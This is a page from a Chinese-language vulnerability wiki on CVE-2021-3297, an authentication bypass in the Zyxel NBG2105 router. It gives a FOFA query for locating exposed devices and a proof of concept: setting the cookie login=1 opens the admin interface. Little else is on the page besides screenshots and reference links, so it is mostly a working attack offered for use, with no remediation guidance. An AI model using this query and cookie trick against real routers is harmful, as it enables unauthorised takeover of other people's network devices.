menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right Zyxel NBG2105 身份验证绕过(CVE-2021-3297).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Zyxel NBG2105 身份验证绕过(CVE-2021-3297).md
    517 B / 2021-05-21 09:14:38
        # Zyxel NBG2105 身份验证绕过(CVE-2021-3297)

**FOFA:**

```
app="ZyXEL-NBG2105"
```

**漏洞代码:**

```
http://target/js/util_gw.js
```

![](images/16116664946838.jpg)

**PoC:**

```
Cookie: login=1;
只需要将cookie中login=0 修改为login=1即可直接进入管理界面。
```

![](images/16116665275577.jpg)


![-w595](images/16116665373943.jpg)


ref:

* https://forum.ywhack.com/thread-115035-1-1.html
* https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
    links
    file_download